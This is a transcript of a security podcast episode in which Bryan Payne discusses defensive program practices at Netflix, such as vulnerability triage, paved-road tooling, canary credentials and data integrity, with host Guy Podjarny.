Skip to main content
Episode 109

Season 7, Episode 109

Empowerment In Security With Bryan D. Payne

Guests:
Bryan D. Payne
Listen on Apple PodcastsListen on Spotify Podcasts

Being passionate about security at a time when industry hadn’t caught on yet, Bryan D. Payne found himself working for the National Security Agency (NSA). During his time there, and in the years that followed where he focused his efforts on research, he learned a number of valuable lessons which he was able to take with him first to a small start up and then to the giant that is Netflix. In today’s conversation, Bryan and I discuss what his role as the Engineering Director of Product and Application Security at Netflix consisted of, the company culture, and how the teams within the company work together to achieve the most effective results. We also get into Bryan’s thoughts on detection methods, data integrity, and how to deal with mistakes that are inevitable when working in the security sphere.

Partager

[00:00:43] Announcer: Hi, you're listening to The Secure Developer. It's part of the DevSecCon community, a platform for developers, operators and security people to share their views and practices on DevSecOps, Dev and Sec collaboration, cloud security, and more. Check out devseccon.com to join the community and find other great resources.

This podcast is sponsored by Snyk. Snyk’s developer security platform helps developers build secure applications without slowing down, fixing vulnerabilities in code, open source containers and infrastructure as code. To learn more, visit snyk.io/tsd. That's snyk.io/tsd.

On today's episode, Guy Podjarny, founder of Snyk, talks to Bryan Payne, previously Engineering Director of Product and Application Security at Netflix. Bryan has worked on both offensive and defensive security projects for government, academia, and industry. As a result, he brings a unique perspective to modern security issues. Bryan is also working to help evolve the computer security community to be more welcoming and inclusive. Through this lens, he has worked with the USENIX Enigma Conference for years to reimagine what security conferences should look like. Similarly, he built Netflix's award-winning and impactful security engineering organization on the belief that we could better enable the business and reduce risk as a partner to other engineering teams rather than a gatekeeper. We hope you enjoy the conversation and don't forget to leave us a review on iTunes if you enjoy today's episode.

[INTERVIEW]

[00:02:25] Guy Podjarny: Hello, everyone. Welcome back to The Secure Developer. Today, we're going to talk about all things empowerment in security, maybe test some limits of the yin and the yang that you might apply to a modern product security program. And to talk about all of those and unravel them, we have Bryan Payne, who until recently has led much of security, including product and application security at Netflix.

Bryan, thanks for coming on to the show.

[00:02:49] Bryan Payne: Thanks for having me.

[00:02:50] Guy Podjarny: So Bryan, before we dig in, you're a free bird for the moment at the time of recording this podcast. But tell us a little bit about what was that recent role that you've done in Netflix, and maybe a bit about your journey getting into that?

[00:03:02] Bryan Payne: Sure. So at Netflix, I lead our product security team, but for us, that was broader than just product security. It included infrastructure security, trust and safety, like fraud and abuse prevention. And it also had a pretty significant software engineering component where we built out identity systems, like authentication, authorization, cryptographic, key management systems, PKI systems, things like that. We also had a program management team that kind of helped keep this honest and help us interface with the rest of engineering across the company at Netflix.

But my journey to Netflix was perhaps a little different than most people in the field. I started a couple decades ago with the government. And my motivation at that time was just simply that I was very interested in security. And there weren't a lot of people in the industry that were doing security work. In fact, I'd interviewed at places like Google and Microsoft, and they didn't even have security teams to put me on.

And so I started at this place called the National Security Agency, because security was part of their name. And it seemed like a great place to go learn. And it was. I had a really interesting time there doing what we now call Blue Team security work, helping to do assessments and help military installations make their systems more secure.

It sort of took me down this lengthy path of research because I was interested in how we could make things better. It turns out that at that time, security as state of the art was often turning the right knob in Windows to get something to be a little harder to hack. And I felt like that's not how the world should be.

And so I really went on this journey of, “Maybe I could improve it by doing research.” I was doing research at NSA. Did research for a DARPA contractor. Eventually, I went off and got my PhD and found my way over to Sandia National Labs to do more research. And I had a really interesting time through all of that, ultimately working on virtualization security and monitoring of virtual machines and these kinds of things. But eventually, I kind of got to the place where I realized that there wasn't a lot of information jumping from the research world back into industry.

And so I decided to really have that broader impact. I wanted to be in industry myself. And that's what eventually brought me out to the San Francisco Bay Area working for a startup for a few years, and then ultimately to Netflix.

[00:05:36] Guy Podjarny: Got it. Interesting route to it. It's funny that the term security doesn't always mean the same thing. The security in the NSA’s initial is not precisely the same as the title you might get at Netflix. When you think about the work that you've done in these sorts of three calibers, how transferable was the knowledge? I mean, what you've done from NSA to research, and then from research to industry, was it 20% knowledge transfer or 80%? Like how useful was the background coming into each of these new spaces?

[00:06:06] Bryan Payne: So it was absolutely helpful, but there was a lot to learn at each step, right? So part of what allows someone to be successful in a government setting is to be able to manage the bureaucracy, much less do your job. And what I found was that skill was less valuable in the private sector. Because in many cases, we might think of a company as being large and bureaucratic, but they can't be quite as large and bureaucratic as the government.

On the security side, though, I think one thing that I really value from my earlier years in the government is the ability to understand the nature of threats. And understand what an adversary can really do with, we’ll say, unlimited resources. And then understand that not every company is under that level of threat. And so kind of being able to balance your security posture appropriately based on the threats that you're seeing, and then have a very tangible sense of what those threats look like became very useful later in my career. And I don't know that I would have seen that quite so realistically had I not started where I did.

[00:07:17] Guy Podjarny: Yeah, that makes sense. And I guess that's the first balance, which is, I guess, not to abuse that Windows dial or button analogy, but how far do you want to turn up that dial?

[00:07:28] Bryan Payne: Absolutely.

[00:07:29] Guy Podjarny: In the sense of how strict and how constrained you need to be. That's an interesting background. I guess it gave you that sort of broad view. Eventually got to Netflix, where presumably bureaucracy is fairly low on the totem pole based on sort of what is so well known and it's been the kind of the core of Netflix as a success element.

Maybe let's dig in a little bit into the balances of empowerment versus these controls. Just kicking off your path? So can you describe a little bit just the high-levels of working in your group at Netflix between the security teams and the development teams? How does responsibility or authority sort of split up over there around the security decisions?

[00:08:10] Bryan Payne: Sure. So if you go read the Netflix culture memo on their website, one of the things that tends to pop out at people is this discussion of freedom and responsibility. And that is a concept that has driven how their engineering organization works over the years. It is interesting because as a human, we tend to index on the freedom side. We say, “Oh, this is great. I can do whatever I want. And I'm sure I'm going to have to be responsible for something. But we'll figure that out.”

In reality, of course, there is a huge responsibility when you're building out software for a company like Netflix. You don't want that service to go down. So reliability matters deeply. You don't want it to be hacked. So security matters deeply. And so somehow, you need to be very responsible as an engineer as well. And I think as a security organization, we often saw ourselves as there to help support and enable the business. So what we wanted to do was allow the software engineers at the company to focus on the areas that they were hired for, effectively, right?

So if you were brought in as a distributed systems engineer, or an encoding engineer, something like this, that should be primarily what you're doing. You shouldn't be stuck dealing with PKI certificates and pulling your hair out. And so we would try to provide like turnkey services that allowed people to not have to worry about these fundamental security things.

And then, of course, they do still have to do something for security, right? They need to be aware of when they're dealing with sensitive information and maybe turn a little configuration knob to allow them to use an authentication system, those kinds of things.

But if they got to a place where security was really, really like critical to what they were doing, then they would be leaning on us for help. And exactly where that boundary is becomes a judgment call, that if you have a good relationship between the security team and the engineers, you can kind of figure that out.

[00:10:31] Guy Podjarny: And how does that – So I see how that works when it comes to PKIs, or authentication, or things that are security-minded functionality that can be packaged up. Still a good idea to remove it. How does it work in terms of the grind, of the, upgrade your libraries because they’re vulnerable, or ensure you apply input validation to everything, or shuffle to fix something when you need to balance that work against building some other feature?

[00:11:02] Bryan Payne: Unfortunately, patch management is still a thing. And we just saw this in December with Log4j, where everyone needed to quickly drop what they were doing and patch things. At the same time, updates come out all the time to software that we use. And not all of them are as critical as the Log4j update.

And so I think one of the important value ads that a security team can provide here is to help people quickly triage and assess what matters and what doesn't. And so what we would do is we would look at where a particular microservice sits within the ecosystem. Is it Internet-facing? What other systems does it connect to? What data does it process? And using all this information, you can start to figure out how important is it that this system is buttoned up to the nth degree? Versus maybe we can let it slide. And when they do like a quarterly update of their OS, they'll just kind of get some patches, and we'll be good.

And so we would be able to make those assessments for the other teams and provide them with a dashboard that they could go to and they would see, “Hey, this is what actually matters today. If you're going to do something on security today, here's the top five things you can do to have a positive impact on your system.” And so that would help people kind of stay aligned.

And also, I think it helped to build a better relationship between the security and engineering teams, because we were no longer the ones who every day were saying, “Oh, my goodness! It's another fire drill. You have to go do this thing.” Instead, we would only come forward when it was something like Log4j and everyone said, “Yeah, this really is a big deal. Let's work together on it.”

[00:12:54] Guy Podjarny: I love the top X issues. And if you were to invest in something, you would secure it. Does that imply that the security team itself, though, needs to review every issue that comes out to classify it and say whether it's in 17 or 700th place? Or would the engineering team? Like how do you see that there's an action here? There's a triage step here. Who does it? And how do you scale it?

[00:13:21] Bryan Payne: So at Netflix, this was the security team’s responsibility. And in order to manage that at scale, we had to start with understanding what the assets looked like across our ecosystem. And frankly, I think this is something that the security industry is starting to come to grasp with, which is it's not particularly exciting, but maybe the most important thing you can do is to have a good asset inventory.

Because if you don't know what's out there, you can't possibly know what you're going to be trying to protect. So if you’ve accomplished that, if you know what software you have deployed and where it is, then you can pull in threat feeds and stuff like this, right? So you can see where the new CVEs are. You can use human intelligence. Maybe you picked up a lead on Twitter, right? You can use your bug bounty program for people telling you about different things that are coming in.

And so you have all of these different inputs. And for each of them, you can look across your asset inventory, and you can say, “Okay, I have a new vulnerability in Apache today. And where do I have Apache deployed? It's on all these systems. Which ones of those are going to matter for this kind of vulnerability? Okay, now we have another subset,” and you can kind of work through it. And so, typically, we would have an on-call analyst that would help with things. But they would only be engaged on the things that were particularly egregious, right? A very high CBSS score, or a bug bounty submission that comes in that's particularly urgent, right? Other things, you can triage through a little more automation. And if you get it slightly imperfect, it's probably going to be okay.

[00:15:07] Guy Podjarny: I get it. So if I’m imagining the flow, just sort of echoing back. First, asset inventory. You have to be able to classify. At this point, it doesn't really matter who is – It's a system that now you have a classified application team, security teams have all fed information into it. Some information automatically gleaned. You have a setup. And that already sets the bar of harshness, I guess, in terms of how strict you need to be around the security issues.

And then subsequently, the alerts are either auto classified and put into the development team’s queue, I guess? Or they are flagged to an on-call. The dev team is not expected to on-call for security issues. The security team has that handled and might wake someone up in turn. But the issues that are auto triage, they do go into the backlog. Or are those also then being vetted by the security team?

[00:16:01] Bryan Payne: All the things tend to come through the security team. Before they would end up like paging an engineer, they would be assessed by a human to make sure that that page makes sense if something is of that severity. Things that are lower severity could go straight into this dashboard. That wouldn't page anyone, but it's the kind of thing that you could periodically check as an engineer to say, “Hey, what are the security things I should be working on?” And that way, we were very careful. We wouldn't want to reach out and ring the alarm bell unless we were 100% certain that this was actually something that mattered.

[00:16:41] Guy Podjarny: Okay, interesting. And so let's talk a little bit about the ranges here indeed, of responsibility. So, here, you have the freedom and responsibility, that famous, sadly infamous F&R of it. And as a security team, your job is to sort of filter and help the development team know what are the top items that they could invest in. And they work on it. How do you then see the ongoing tracking of whether these things have or have not been done? How do you think about the responsibility split to actually eventually act on these five issues? Is the security team tracking that? Or is it the engineering team?

[00:17:17] Bryan Payne: Right. So once again, security will track it in terms of time during mediation. Particularly, they would set up an SLA for the severity of the security incident, right? So let's say it was a really egregious thing. Then they're going to want to close it out really fast. Let's say it's like a low or a medium, that could take a couple months, and that might be just fine.

And so the first step is to figure out like how long would you expect this to take? And then you can go back and you can start to say, “Well, how long did it take? Is it a problem?” Now, you don't always meet your targets. That's fine. And we wouldn't get particularly upset if someone missed something here or there. However, what you can look at is trend lines over time.

And what I have typically seen is that you'll have some organizations that anytime security put something in front of them, they're very good about just taking care of it. And then you have other organizations that security just never quite bubbles up for them. And so for me, it almost becomes more of a cultural humankind of relationship challenge than a technical challenge at that point.

And with the information showing which teams are doing what, you're able to then go to the ones who are struggling to prioritize security and just sit down and have that conversation, “Hey, you know what? What's going on over here? Are you all really busy? Do you have some hard deadlines you're trying to meet? Have you not staffed enough to take care of your side of the security responsibility? Do you understand what your responsibility even is? Maybe we should talk through that.”

And I find that, frankly, by the time you have that kind of a conversation, people start to get it and they start to say, “Oh, maybe I didn't realize you were asking us to do this. But now I know. And we got it,” right? It's pretty rare that those things require three, four or five conversations before they get results. Because what I found is that people generally want to do the right thing. They just – They need a little guidance. Maybe they don't understand the prioritization of different things or how to think about it. But once you set that stage for them, you can get the results that you're looking for.

[00:19:28] Guy Podjarny: Yeah, I love that. So you've mentioned relationships several times here on it, because fundamentally, it sounds like, as a security team building two types of services or two types of platforms. On one hand, it's this triage system. Human assisted or human aided by the security team cycles to inform the teams then about which issues they should address the dev teams. But then subsequently, it's the mentoring, it's the guidance and maybe the probing that you do as a team. How do you structure the team to work that way? Is it the same? Is it just a central service organization, and you would go to whatever random team needed that support? Is it more of a partnership model where specific security people are affiliated with certain development teams?

[00:20:17] Bryan Payne: So this is going to get back to something that's going to be very different for each company, the level of security that they're trying to achieve, what sort of threats they're getting against them, and all of that. So I can speak a little bit to what we did at Netflix, but just with the intro that, hey, this may not be right for you, right?

At Netflix, what we tried to do was to assess where the biggest security risks were across the company. And we would use quantitative risk measurement mechanisms to kind of ballpark what that would look like. And then we could go into specific software systems and say, “These teams need the most support from security.” Think of it as your top five list, maybe it's 10, or 15. But for each of those teams, there's a dedicated security engineer, we would call them a security partner, who would work with those teams. And so you have a human that you can talk to, and you know it's always that same person.

And that was great, because you could build that relationship. And they would operate not at the level of just doing an assessment on the software and reporting a bunch of vulnerabilities, but more at the level of where's the business going for your chunk of software? And what is the architecture of the system? What sort of data are you transiting through your system? Right? What changes are in store in the next year or two? And how do we get ahead of that? And so they would try to sort of up-level all those conversations to make sure that security is being done well, really from the business perspective.

All of the rest of the company, then, which is really the vast majority of the software being built, did not have a dedicated human responsible for making sure it was secure. And so for those things, we would lean back on a couple of things. One is the systems that I described earlier, that would tell you your top five security things you need to adjust. And the other is what Netflix called the paved road. The paved road at Netflix is a set of software that the idea is it's a good idea for you to use.

Again, with freedom and responsibility, we don't require you to use it, but it's a good idea for you to use it. And if you do, you get very convenient RPC mechanisms, databases, base server, all the pieces that you might want. Oh, and by the way, when you use them, you get the security side effects that we want. And so if you use the paved road RPC mechanism, it's going to be authenticated already. It's going to have an Authz policy in place. You can tweak it if you want, but it's there, and you're just doing policy adjustments at this point. You're not trying to integrate it everywhere. And so all of those things meant that the vast majority of the company was in a really good place to start with. And we didn't have to stress too much about software defects because they wouldn't take you very far if they were exploited.

[00:23:32] Guy Podjarny: Yeah, that makes a lot of sense. I love the paved road concept. And I've been using and abusing it in many places, because it is a great notion of, if you make it easy, people will opt-in at the end of the day unless they have a good reason not to. Versus if you bash them on the head and keep telling them they need to, you might create quite the opposite reaction.

[00:23:54] Bryan Payne: Absolutely.

[00:23:54] Guy Podjarny: So I love the delineation, and seems very smart to focus on the items that are at the top or managing your security investment based on the risk that gets represented versus just some even spread of everybody gets the same type solution.

Can we maybe shift gears a little bit? I think this sounds like a great sort of service-oriented security team satisfying the different parts of the organization. And we talked a little bit about measurement that might be a little bit less focused on measuring, and KPIs, and things like that and more on awareness, and working with the right teams.

Let's talk a little bit about iteration. So you actually gave this very interesting industry-wide talk at AppSec Cali a couple years ago about the notion to – I think the title was Fail, Learn, Fix. And I, just a bit of a rant on my end, which is I know that like the DevOps industry has been very predicated on this notion of iteration, of saying. “It's fine if you have some problems in production as long as you identify and fix them quickly, it's better to do that than to get into some paralysis move of trying to find every single problem before you ever deploy it.” And people got forgiving on the notion of a hiccup in your uptime. Not always that forgiving, but maybe a bit of an acceptance there.

Security, not necessarily well known for being a forgiving setup. You can just say, “Look, I'll have a mini breach here, and that's okay.” How do think about iterations? How do you think indeed about failing, making that productive in security?

[00:25:29] Bryan Payne: So I think security professionals end up with a lot of stress. And I think a lot of that stress comes from this mindset that you're just saying, which is like, “We can't have a mistake.” And at the end of the day, security professionals are humans, just like all the rest of us. And that means we will be making mistakes.

And so for me, the first step here is to just acknowledge that, even in security, we're going to have mistakes. There's going to be, like you said, mini breaches. Not M, A, N Y, but M, I, N, I breaches, right? And I think, if you can step past that, and start to say, “Okay. Then what? In a world where this is going to happen, how do we make it okay?”

And pretty quickly, I think you get to the place that you say, “Well, not all breaches are the same,” right? There's a breach, and then there's a breach, right? And it says ones where you're putting customer data or sensitive information at risk. Like these are really bad things, and you don't want those to happen. But every day, you've got people coming in through bug bounty programs, finding mistakes in your software that you had no idea was the case. And each one of those is an opportunity to learn.

And really, I think that's what a good incident response program is all about, right? You want to quickly assess the situation. You want to button it up. But you want to learn, and you want to figure out, how do we then evolve forward so that this kind of thing doesn't turn into one of those bigger breaches that's a really bad day, and it stays at this level of a learning breach, right? Of course, you'll learn from the big ones too, but those are probably not the best ones to learn off. We like to learn from the little ones so we don't have those really big ones.

[00:27:41] Guy Podjarny: How do you gain visibility to those? I mean, again, kind of drawing the DevOps analogy, generally you’d say it's fine for you to deploy more rapidly. But to do so, you have to have some observability in place, otherwise you wouldn't know that you've gone down. So you lose the opportunity to learn. What’s the equivalent observability that you need to spot these mini mistakes in security?

[00:28:07] Bryan Payne: This is the whole world of detection at some level. And it's rich and diverse. And it's going to depend on what you have deployed. I've seen a variety of interesting things work over the years. One that I particularly like is the use of canaries, because it's a little non-traditional, perhaps, right? So when I say non-traditional, I mentioned that I started my work in the research world. And at that time, everyone was really looking at anomaly detection systems. Like, “I'm going to monitor this thing, and I'm going to find the needle in the haystack. I'm going to tell you when there's a problem.” And they just never really worked that great, because it's really hard to do that, especially when you look at the scale of a place like Netflix or something, finding that needle in the haystack can be really hard.

Canaries can flip the game over, right? So in this case, I'm talking about can I put an AWS key on an instance that looks, for all practical purposes, legit. An attacker would see it and say, “Oh, my goodness, I just found something particularly interesting.” They test it out. They see if it works. And lo and behold, as soon as they do, all your alarm bells go off, because that key should never be used, right?

And so now all of a sudden, it's like a little trip wire that the attacker ran into, and now you know that they're there. It depends on what your infrastructure is. But stuff like that can work really well in certain settings. Other things that we've toyed with that could be fun. Think about architectures where you have an auto-scaling group. You have a whole bunch of instances that should look identical to each other. And so now you can start to say, “Well, maybe I can monitor these. And all I'm doing is checking out the differences between those instances. And if one deviates too far, then I'm going to be a little concerned,” right? And so you've got like a baseline that you can check on. So you can do this kind of stuff.

Interestingly, though, even with all the research and all the state-of-the-art that we have, a lot of detections come back to things that are much simpler, right? A software engineering team is monitoring their systems and they notice that the CPU load is outside of the range that they would expect. And they start looking into it. They say, “Whoa, I don't like what I'm seeing here. It looks like someone SSH’d into this box. And I don't know why.” They call over the security team. You spin up an incident. And you learn.

So I think things like this tend to be, even today, how a lot of things are found. There's arguably room to improve there. But pragmatically, I think that is an important signal. And I think that's part of the reason that you want to have a good relationship between security and software teams.

[00:30:50] Guy Podjarny: First of all, I love the ideas of the canaries. To sort of a probe on it, these canaries would be within systems? So you'll take a server that an attacker shouldn't have access to their file systems and you would be able to put a key on it. It's not the same as putting a key on an open S3 bucket and testing the attacker’s systems. That's not the goal here. But rather putting it on a place the attacker should not be able to reach?

[00:31:13] Bryan Payne: That's exactly right. Yeah. So I mean, sure, you can put it on an S3 bucket and see if anyone starts numerating your stuff. That could be interesting. But it might be noisier. So the idea here would be just throw it on the root folder of a system, or maybe a place that if the webserver has popped, it would be part of what they could enumerate. You want to be at least one stage into the attack at that point, right? And then they start to see it and say, “Oh, I'm succeeding. I got something right.” So the attacker starts to trigger it.

[00:31:42] Guy Podjarny: Yeah. I love the idea. It's, it's actually new to me, you know. So maybe I’m just behind here. But I love it. Is there some design system for this? Some open source project or some tool that can help with that?

[00:31:53] Bryan Payne: I'm not aware of an open source project on it. It is an idea that we've talked a little bit about at, I believe, at AppSec USA in the past. I'd have to double-check that. But you can look for some talks from Netflix on the Netflix security YouTube channel. I'm pretty sure we've spoken about these canaries in the past.

[00:32:11] Guy Podjarny: Yeah. No. Excellent. And so the canaries are great. Also, love the meta idea of saying no matter how much you invested in these types of indicators, learning from incidents and learnings from the actual kind of little failures that we've identified, being the strength of it. So with that, I think we have time for maybe like one more topic.

I'd love to talk – Indeed, you mentioned relationship is a fair bit. But you also mentioned platforms, and technology, and paved roads. How do you think about the tech versus human side of security when you think about scaling, developer security, scaling sort of securing the applications? What's your view or philosophy about the things that should be solved with tech and the things that cannot need the human touch?

[00:33:04] Bryan Payne: I think we can solve a surprisingly large amount through tech. But I think it's not as simple as just saying tech or human. Because to solve it through tech, you have to think about the human in a sense. You need to make the systems easier to use. I gave a presentation many years ago where I compared the PI crypto library to the open SSL library for what a software engineer has to do to correctly encrypt some data. And one was encrypt parentheses data. And then it's correct. And the other was 100 lines of code. And then you have to ask yourself, “Well, even if you hire the best software engineers in the world, where are you more likely to see a problem?”

For me, we can solve a lot of these problems through tech, but we have to find the right abstraction layers, and set it up in a way so that people can correctly accomplish their tasks without so much extra mental processing that they are set up for failure. So I think that's sort of step one. And I think part of that will be continuing to reevaluate where the abstraction layer should be. If you think about things like infrastructure as a service, you're running your software on someone else's hardware. And then you look at platform as a service, you running your software on a slightly more abstracted set of systems, right? And the latter might be easier to create a good security story around, because higher abstraction layers allow for some of the more challenging security problems to be solved once and done as opposed to a whole bunch of times. So I think that will be interesting to see.

Even with all that, though, humans are very much an important part of the picture. Because at the end of the day, you can write software and you can be focused on what you're doing, but we're going to keep making mistakes. The way we've built computers, there will be security problems. And so there's going to be people that are better at knowing the security implications to the business, and people that are better at writing the software that the business needs. And somehow, they're going to have to work together to allow the business to move forward with the appropriate level of risk. And that's the human element of it.

And so, the security teams that I've seen that are most successful are the ones that acknowledged that people don't love to go talk to security. We kind of have a bad reputation sometimes of being a little difficult or a little stubborn. And so if you cannot be those things, right? If you can be more welcoming. If you can find better language to use. Just kind of better customer service in a sense. Then you can build those relationships in a way that starts to make things easier for everyone. And then makes it easier for people in the company that aren't security experts to feel like it's okay to go lean on the security team.

[00:36:22] Guy Podjarny: No. That's very, very well said. I guess I'd be remiss not to sort of mention that the whole ethos, really, when it came to Snyk, was to try and build a developer tool. So first and foremost, the usability to developers. And then subsequently achieve a security goal to it. But I think a lot of it really revolves around the usability of the tech, which I guess was the first point, at least, you relate to. So never easy. And, hopefully, sometimes you did better, sometimes you did worse, but a similar lens of view.

So, Bryan, tons of great insights over here. And I have probably about three or four different things that I still want to ask you about. I think we're kind of coming up on time here. Before I kind of let you off to enjoy some of the freedom that you have right now, just maybe a bit of a forward-looking question. So when you look at the industry, so far we've talked about organizations, maybe in practices, if you had unlimited budgets and resources at your disposal, what problem that we're facing right now would you say we need to solve or you would take on? And maybe like a little bit about what approach would you take?

[00:37:33] Bryan Payne: The one problem that I keep scratching my head on has to do with integrity of data. And I mean this in a very classical sense. If you go back to the days of mandatory access controls and these original sort of military systems that were built, they looked at data from different integrity levels. And like data coming off the internet from a client would be very low integrity data. Data from a trusted system would be high integrity data. And in no sense should you ever have low integrity data influencing the execution of a high integrity system, for example. And so mandatory access controls were able to sort of set you up so that wouldn't happen. That was many, many decades ago that people were building systems like this.

And then last month, Lof4j happens. And it is almost exactly that situation where a client can send data that ultimately gets executed. And you have to ask, why is it that after all these years we're still suffering of the same problems? And the best answer I've come up with is just that it's so complicated, that to do these kinds of controls on modern systems becomes intractable.

I go back to a time when I was in the room with the creators of SELinux, and the creators of AppArmor, two competing Mandatory Access Control Systems. AppArmor was a little more user-friendly. And SELinux was super fine-grained, and you can control the things. And the creators of SELinux said this was necessary because the system that they're protecting is that complicated, the Linux kernel. So you can't have a policy that's less complicated than the kernel because you're protecting the kernel, which intuitively makes sense. But it also means no one's going to use it. How many times have you booted up a system and found that SELinux was on and said, “Well, I think I'll just disable that so I can get my job done.”

Now, things have been getting better over the years, to be sure. But how do we come back to this data integrity problem? How do we create a world where, sure, Log4j is vulnerable? But you know what? You can't exploit it. Because that's low integrity data and it shouldn't be doing anything to your system. I would love to take a stab at that and figure out how do we make that better? So that, frankly, entire classes of vulnerabilities go from being really, really high to really, really low. And it’s a, “We'll patch it when we have time,” situation. I think that would be a game-changer for how we think about security. I think, frankly, it hasn't been solved just because it's pretty complicated. And I'm not suggesting that I have a magic, really clever idea of how to solve it right now. But it's certainly something that's been on my mind over the years. And if I come up with a cool solution, I would be all over that.

[00:40:41] Guy Podjarny: Yeah. Sounds like a great one. And I love the way that you phrase it. It's reminiscent, a little bit, of the conversation we have right now around trust in the supply chain security space. But it really boils down to how much do you trust this data? And if the answer is not at all, then whatever payload that is should never get executed. Now, how do you get that to reality? That's a whole different ball game.

So, Bryan, thanks for all the great insights here and for coming on to the show to share it.

[00:41:12] Bryan Payne: Thank you. It's been great.

[00:41:14] Guy Podjarny: And thanks, everybody, for tuning in. And I hope you join us for the next one.

[OUTRO]

[00:41:21] ANNOUNCER: Thanks for listening to The Secure Developer. That's all we have time for today. To find additional episodes and full transcriptions, visit thesecuredeveloper.com. If you'd like to be a guest on the show or get involved in the community, find us on Twitter at @devseccon. Don't forget to leave us a review on iTunes if you enjoyed today's episode. Bye for now.

[END]